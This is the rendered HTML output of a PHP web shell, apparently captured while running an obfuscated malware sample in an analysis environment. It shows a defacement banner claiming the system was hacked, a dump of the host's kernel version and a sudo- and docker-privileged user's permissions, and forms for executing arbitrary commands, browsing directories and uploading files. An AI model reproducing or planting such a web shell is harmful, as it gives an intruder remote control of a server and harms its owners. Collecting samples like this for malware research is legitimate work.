?><style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style><center><h1>#worst @dal.net</h1></center><center><h1>You have been hack By Shany with Love To #worst.</h1></center><center><h1>Watch Your system Shany was here.</h1></center><center><h1>Linux Shells</h1></center><hr><hr><table><tr><td><b>We are:</b></td><td> ()</td></tr><tr><td><b>Server is:</b></td><td></td></tr><tr><td><b>System type:</b></td><td>Linux cj-pc 4.15.0-76-generic #86~16.04.1-Ubuntu SMP Mon Jan 20 11:02:50 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
</td></tr><tr><td><b>Our permissions:</b></td><td>uid=1000(cj) gid=1000(cj) groups=1000(cj),4(adm),20(dialout),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),997(docker),1001(uinput)
</td></tr></table><hr><hr><form method=post enctype="multipart/form-data"><table><tr><td><b>Execute command:</b></td><td><input size=100 name="_cmd" value=""></td><td><input type=submit name=_act value="Execute!"></td></tr><tr><td><b>Change directory:</b></td><td><input size=100 name="_cwd" value="/home/cj/MALMAX/malmax-shipped/malmax-shipped/samples/obfuscated/3
"></td><td><input type=submit name=_act value="List files!"></td></tr><tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td><td><input type=submit name=_act value="Upload!"></td></tr></table></form><hr><hr>

<!-- OUTPUT STARTS HERE -->
<pre>

</pre>
<!-- OUTPUT ENDS HERE -->

</center><hr><hr><center><b>Command completed</b></center>